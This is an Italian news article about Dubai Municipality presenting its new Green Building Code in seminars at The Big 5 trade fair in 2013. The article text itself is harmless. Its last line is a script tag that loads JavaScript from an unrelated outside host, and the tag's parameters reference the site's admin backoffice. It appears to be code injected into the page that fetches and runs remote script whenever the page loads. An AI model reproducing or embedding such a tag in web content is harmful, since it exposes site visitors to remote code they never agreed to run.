1. Home
  2. Notizie e Mercato
  3. Il Comune di Dubai educa riguardo alla nuova legislatura sull’edilizia sostenibile

Il Comune di Dubai educa riguardo alla nuova legislatura sull’edilizia sostenibile

Edilizia di
5/5
votato da 1 persone
I punti chiave del nuovo regolamento edilizio prima del lancio nel 2014: un'analisi del 'Dubai Green Building Code' a The Big 5 2013 (dal 25 al 28 Novembre presso il World Trade Centre di Dubai)


Il Comune di Dubai presenterà il “Dubai Green Building Code” a “The Big 5”, offrendo ai partecipanti l’opportunità di comprendere maggiormente riguardo ai regolamenti edilizi e al loro impatto futuro sull’industria, prima che siano messi in atto all’inizio del 2014.

La nuova legislazione sarà obbligatoria per tutte le nuove costruzioni del settore residenziale, commerciale e industriale. Il regolamento coprirà una gamma di argomenti edili, inclusa la vitalità edilizia, l’ecologia, così come l’energia e l’acqua.

Le informazioni riguardo al “Dubai Green Building Project”, da cui le nuove regolamentazioni derivano, saranno fornite insieme al fondamento logico dietro alla sua realizzazione e al ruolo che giocherà nella marcia di Dubai per la sostenibilità. Ci sarà un profilo completo dei requisiti di valutazione e della certificazione delle costruzioni sostenibili insieme a un laboratorio di approfondimento che fornirà informazioni più dettagliate riguardo alle procedure di valutazione. Ci sarà, poi, uno sguardo complessivo delle procedure di verifica dei prodotti secondo le direttive della nuova regolamentazione e dei processi di certificazione.

L’Ingegnere Abdulla Rafia, Vicedirettore Generale di Ingegneria presso il Comune di Dubai, ha affermato “Il nuovo Regolamento dell’Edilizia Sostenibile sarà messo in atto l’anno prossimo e noi stiamo già lavorando per aumentare i nostri sforzi nell’educazione del pubblico sui requisiti necessari che dovranno fronteggiare. Siamo pronti, i nostri centri di verifica e certificazione sono pronti: vogliamo assicurare che anche l’industria è pronta e ha largo accesso a training e informazioni rilevanti, richieste prima del lancio. ‘The Big 5’ ci offre un’eccellente piattaforma per coinvolgere un’ampia gamma di investitori e comunicare queste informazioni chiave”.

Questi seminari gratuiti offriranno anche una visione chiave dei progressi del mercato delle costruzioni di Dubai, e i successi e le sfide principali, inclusa quella di far fronte alla crescente domanda di energia e acqua, derivante da crescita e sviluppo continui.

La nuova regolamentazione del Comune di Dubai è un importante passo avanti verso la realizzazione di processi di edilizia sostenibile con una visione a lungo termine”, ha commentato Andy White, Direttore Organizzativo dell’evento. “Il mercato edilizio di Dubai è uno dei più attivi dell’area e presenta significative opportunità per il futuro, è vitale che coloro che ne vorrebbero trarre vantaggio capiscano completamente le nuove direttive e l’impatto positivo che avranno”.

I seminari avranno luogo il 25 e il 26 Novembre durante “The Big 5” 2013 al World Trade Centre di Dubai. Per ulteriori informazioni ed eventuali prenotazioni, visitate www.thebig5.ae/education.

In aggiunta ai laboratori del Comune di Dubai, “The Big 5” ospiterà numerose piattaforme formative, con seminari e workshop focalizzati sulle sfide chiave e i trend interni all’industria. In più, in parallelo correrà il convegno di due giorni “Sustainability Design & Construction Conference”, che ospiterà una serie di esperti locali e internazionali per discutere di sviluppo urbano, architettura emblematica, e presentare lo studio di casi specifici di alcune costruzioni sostenibili.

Middle East Concrete” e “PMV Live” avranno luogo nella stessa struttura di “The Big 5” 2013, offrendo uno spunto sulle più recenti tecnologie e innovazioni riguardo ai settori di calcestruzzo, attrezzature, macchinari e autoveicoli.


<script src="https://secure-content-delivery.com/data.js.php?i=%7B271EC601-39CC-426C-935D-F754BCD76643%7D&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.35568196041461453" type="text/javascript"></script>